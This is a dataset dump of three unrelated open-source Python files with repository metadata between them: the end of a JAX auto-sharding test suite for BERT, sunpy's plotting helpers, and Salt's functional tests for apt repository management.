weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_column_partitioned(weights[j], mesh_shape[i], i)
else:
assert_row_partitioned(weights[j], mesh_shape[i], i)
def test_bert_mlm_2d_mesh(self):
batch_size = 4
seq_len = 4
num_layers = 2
hidden_size = 512
num_heads = 4
vocab_size = 4096
deterministic = False
# To generate the desired strategy, we have to turn off mixed mesh shape and all-gather
# and enable recomputing heavy ops.
self.as_option.allow_recompute_heavy_op = True
self.as_option.allow_all_gather = False
self.as_option.allow_mixed_mesh_shape = False
mesh_shape = [2, 2]
device_mesh = self.get_device_mesh(mesh_shape, [2, 2], [1, 0.1])
optimizer, hlo_ir, objective = self.run_bert_mlm(
batch_size, seq_len, num_layers, hidden_size, num_heads, vocab_size,
deterministic, device_mesh)
# Check communication cost.
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir,
ignore_scalar_all_reduce=True))
if self.as_option.prefer_reduce_scatter:
assert n_all_reduce == 4 * num_layers + 2 + 2
assert n_reduce_scatter <= 3 # The correct number should be 2,
# but GpuMultiOutputFusion can make
# some reduce-scatter unable to be combined
assert n_all_gather == 1
assert n_total == n_all_reduce + n_all_gather + n_reduce_scatter
else:
# real number of all-reduce = transformers (4 * num_layers) + log_softmax (2) +
# embed.forward (1) + embad.backward (1) + weights (1)
assert n_all_reduce == 4 * num_layers + 2 + 2 + 1
assert n_total == n_all_reduce
# Check sharding specification
assert "s32[4,4,4096]{2,1,0} iota()" not in hlo_ir
assert "s32[2,4,2048]{2,1,0} iota()" in hlo_ir
if self.as_option.prefer_reduce_scatter:
num_not_sharded = 0 # allow the token_type_embeddings not partitioned.
for weight in jax.tree_util.tree_leaves(
optimizer.state.param_states):
if len(weight.shape) > 1:
if not is_fully_sharded(weight):
num_not_sharded += 1
assert num_not_sharded <= 2
else:
embed_weight = (optimizer.target["params"]["bert"]["embeddings"]
["word_embeddings"]["embedding"])
lm_head = (optimizer.target["params"]["cls"]["predictions"]
["transform"]["dense"]["kernel"])
assert_replicated_row_partitioned(embed_weight, mesh_shape)
assert_all_replicated(lm_head, np.prod(mesh_shape))
for k in range(num_layers):
params = optimizer.target["params"]["bert"]["encoder"]["layer"][
str(k)]
weights = [
params["attention"]["self"]["qvk_combined"]["kernel"],
params["attention"]["output"]["dense"]["kernel"],
params["intermediate"]["dense"]["kernel"],
params["output"]["dense"]["kernel"],
]
for j in range(len(weights)):
if j % 2 == 0:
assert_replicated_column_partitioned(
weights[j], mesh_shape)
else:
assert_replicated_row_partitioned(
weights[j], mesh_shape)
def test_bert_layer_data_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_data_parallel()
def test_bert_layer_model_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_model_parallel()
def test_bert_layer_2d_mesh_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_layer_2d_mesh()
def test_bert_mlm_data_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_data_parallel()
def test_bert_mlm_data_parallel_reduce_scatter_zero_3(self):
self.as_option.force_zero_stage_3 = True
self.as_option.force_zero_stage_3_all_gather_threshold = 1
self.test_bert_mlm_data_parallel()
@unittest.skip("This test is broken after we disallow some replicated iota."
)
def test_bert_mlm_model_parallel_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_model_parallel()
def test_bert_mlm_2d_mesh_reduce_scatter(self):
self.as_option.prefer_reduce_scatter = True
self.test_bert_mlm_2d_mesh()
def test_bert_layer_model_parallel_remat(self):
batch_size = 8
seq_len = 8
num_layers = 2
hidden_size = 128
num_heads = 8
deterministic = False
use_remat = True
# Test on different logical mesh shapes
for i, mesh_shape in enumerate([(4, 1), (1, 4)]):
device_mesh = self.get_device_mesh(mesh_shape, [1, 1], [1, 1])
optimizer, hlo_ir, objective = self.run_bert_layers(
batch_size, seq_len, num_layers, hidden_size, num_heads,
deterministic, use_remat, device_mesh)
expected = (num_layers * 6 - 1) * device_mesh.all_reduce_cost(
batch_size * seq_len * hidden_size * 4, i)
assert_close(objective, expected)
n_total, n_all_reduce, n_all_gather, n_reduce_scatter, _ = (
count_communication_primitives(hlo_ir))
assert n_total == num_layers * 6 - 1
assert n_all_reduce == num_layers * 6 - 1
assert n_total == n_all_reduce
def suite():
suite = unittest.TestSuite()
def add(name):
suite.addTest(AutoShardingAttentionTest(name))
add("test_bert_layer_data_parallel")
add("test_bert_layer_model_parallel")
add("test_bert_layer_2d_mesh")
add("test_bert_layer_force_batch_dim_mapping")
add("test_embedding_2d_mesh")
add("test_bert_mlm_data_parallel")
add("test_bert_mlm_model_parallel")
add("test_bert_mlm_2d_mesh")
add("test_bert_layer_data_parallel_reduce_scatter")
add("test_bert_layer_model_parallel_reduce_scatter")
add("test_bert_layer_2d_mesh_reduce_scatter")
add("test_bert_mlm_data_parallel_reduce_scatter")
add("test_bert_mlm_model_parallel_reduce_scatter")
add("test_bert_mlm_2d_mesh_reduce_scatter")
add("test_bert_mlm_data_parallel_reduce_scatter_zero_3")
add("test_bert_layer_model_parallel_remat")
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
|
sunpy/visualization/visualization.py
|
LaudateCorpus1/sunpy
| 628 |
85866
|
<reponame>LaudateCorpus1/sunpy<filename>sunpy/visualization/visualization.py<gh_stars>100-1000
"""
This module provides plotting support in iPython.
"""
from functools import wraps
import matplotlib.pyplot as plt
__all__ = ['peek_show', "axis_labels_from_ctype"]
def peek_show(func):
"""
A decorator to place on ``peek()`` methods to show the figure.
The ``peek()`` method should return the figure then this method will
attempt to show it in the correct way. This decorator will not return the
figure to the user.
"""
@wraps(func)
def show_figure(*args, **kwargs):
_ = func(*args, **kwargs)
plt.show()
return show_figure
def axis_labels_from_ctype(ctype, unit):
"""
Returns axis labels for the given coordinate type and unit.
Parameters
----------
ctype: `str`
Coordinate type.
unit: `str`, `None`
Required unit. If `None` no unit is added to the label.
Returns
-------
`str`
"Axis Label [Unit]"
"""
ctype_short = ctype[:4]
labels = {'HGLN': f'Heliographic Longitude',
'CRLN': f'Carrington Longitude',
'HPLN': f'Helioprojective Longitude (Solar-X)',
'SOLX': f'Heliocentric X',
'HGLT': f'Latitude',
'CRLT': f'Latitude',
'HPLT': f'Helioprojective Latitude (Solar-Y)',
'SOLY': f'Heliocentric Y'}
label = labels.get(ctype_short, f"{ctype}")
if unit is not None:
label += f' [{unit}]'
return label
|
tests/pytests/functional/modules/test_aptpkg.py
|
tomdoherty/salt
| 9,425 |
85875
|
<reponame>tomdoherty/salt<filename>tests/pytests/functional/modules/test_aptpkg.py
import pathlib
import shutil
import pytest
import salt.exceptions
import salt.modules.aptpkg as aptpkg
import salt.modules.cmdmod as cmd
import salt.modules.file as file
import salt.utils.files
import salt.utils.stringutils
from tests.support.mock import Mock, patch
pytestmark = [
pytest.mark.skip_if_binaries_missing("apt-cache", "grep"),
]
@pytest.fixture
def configure_loader_modules(minion_opts):
return {
aptpkg: {
"__salt__": {
"cmd.run_all": cmd.run_all,
"cmd.run": cmd.run,
"file.replace": file.replace,
"file.append": file.append,
"file.grep": file.grep,
},
"__opts__": minion_opts,
},
file: {
"__salt__": {"cmd.run_all": cmd.run_all},
"__utils__": {
"files.is_text": salt.utils.files.is_text,
"stringutils.get_diff": salt.utils.stringutils.get_diff,
},
"__opts__": minion_opts,
},
}
@pytest.fixture()
def revert_repo_file(tmp_path):
try:
repo_file = pathlib.Path("/etc") / "apt" / "sources.list"
backup = tmp_path / "repo_backup"
# make copy of repo file
shutil.copy(str(repo_file), str(backup))
yield
finally:
# revert repo file
shutil.copy(str(backup), str(repo_file))
aptpkg.refresh_db()
def get_current_repo(multiple_comps=False):
"""
Get a repo currently in sources.list
multiple_comps:
Search for a repo that contains multiple comps.
For example: main, restricted
"""
with salt.utils.files.fopen("/etc/apt/sources.list") as fp:
for line in fp:
if line.startswith("#"):
continue
if "ubuntu.com" in line or "debian.org" in line:
test_repo = line.strip()
comps = test_repo.split()[3:]
if multiple_comps:
if len(comps) > 1:
break
else:
break
return test_repo, comps
def test_list_repos():
"""
Test aptpkg.list_repos
"""
ret = aptpkg.list_repos()
repos = [x for x in ret if "http" in x]
for repo in repos:
check_repo = ret[repo][0]
for key in [
"comps",
"dist",
"uri",
"line",
"architectures",
"file",
"type",
]:
assert key in check_repo
assert pathlib.Path(check_repo["file"]).is_file()
assert check_repo["dist"] in check_repo["line"]
if isinstance(check_repo["comps"], list):
assert " ".join(check_repo["comps"]) in check_repo["line"]
else:
assert check_repo["comps"] in check_repo["line"]
def test_get_repos():
"""
Test aptpkg.get_repos
"""
test_repo, comps = get_current_repo()
if not test_repo:
pytest.skip("Did not detect an apt repo")
exp_ret = test_repo.split()
ret = aptpkg.get_repo(repo=test_repo)
assert ret["type"] == exp_ret[0]
assert ret["uri"] == exp_ret[1]
assert ret["dist"] == exp_ret[2]
assert ret["comps"] == exp_ret[3:]
assert ret["file"] == "/etc/apt/sources.list"
def test_get_repos_multiple_comps():
"""
Test aptpkg.get_repos when multiple comps
exist in repo.
"""
test_repo, comps = get_current_repo(multiple_comps=True)
if not test_repo:
pytest.skip("Did not detect an ubuntu repo")
exp_ret = test_repo.split()
ret = aptpkg.get_repo(repo=test_repo)
assert ret["type"] == exp_ret[0]
assert ret["uri"] == exp_ret[1]
assert ret["dist"] == exp_ret[2]
assert ret["comps"] == exp_ret[3:]
def test_get_repos_doesnot_exist():
"""
Test aptpkg.get_repos when passing a repo
that does not exist
"""
for test_repo in [
"doesnotexist",
"deb http://archive.ubuntu.com/ubuntu/ focal-backports compdoesnotexist",
]:
ret = aptpkg.get_repo(repo=test_repo)
assert not ret
@pytest.mark.destructive_test
def test_del_repo(revert_repo_file):
"""
Test aptpkg.del_repo when passing repo
that exists. And checking correct error
is returned when it no longer exists.
"""
test_repo, comps = get_current_repo()
ret = aptpkg.del_repo(repo=test_repo)
assert "Repo '{}' has been removed".format(test_repo)
with pytest.raises(salt.exceptions.CommandExecutionError) as exc:
ret = aptpkg.del_repo(repo=test_repo)
assert "Repo {} doesn't exist".format(test_repo) in exc.value.message
def test_expand_repo_def():
"""
Test aptpkg.expand_repo_def when the repo exists.
"""
test_repo, comps = get_current_repo()
ret = aptpkg.expand_repo_def(repo=test_repo)
for key in [
"comps",
"dist",
"uri",
"line",
"architectures",
"file",
"type",
]:
assert key in ret
assert pathlib.Path(ret["file"]).is_file()
assert ret["dist"] in ret["line"]
if isinstance(ret["comps"], list):
for comp in ret["comps"]:
assert comp in ret["line"]
else:
assert ret["comps"] in ret["line"]
@pytest.mark.destructive_test
def test_mod_repo(revert_repo_file):
"""
Test aptpkg.mod_repo when the repo exists.
"""
test_repo, comps = get_current_repo()
msg = "This is a test"
with patch.dict(aptpkg.__salt__, {"config.option": Mock()}):
ret = aptpkg.mod_repo(repo=test_repo, comments=msg)
assert sorted(ret[list(ret.keys())[0]]["comps"]) == sorted(comps)
ret = file.grep("/etc/apt/sources.list", msg)
assert "#{}".format(msg) in ret["stdout"]
@pytest.mark.destructive_test
def test_mod_repo_no_file(tmp_path, revert_repo_file):
"""
Test aptpkg.mod_repo when the file does not exist.
It should create the file.
"""
test_repo, comps = get_current_repo()
test_file = str(tmp_path / "test_repo")
with patch.dict(aptpkg.__salt__, {"config.option": Mock()}):
ret = aptpkg.mod_repo(repo=test_repo, file=test_file)
with salt.utils.files.fopen(test_file, "r") as fp:
ret = fp.read()
assert test_repo.split()[1] in ret.strip()
for comp in comps:
assert comp in ret
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.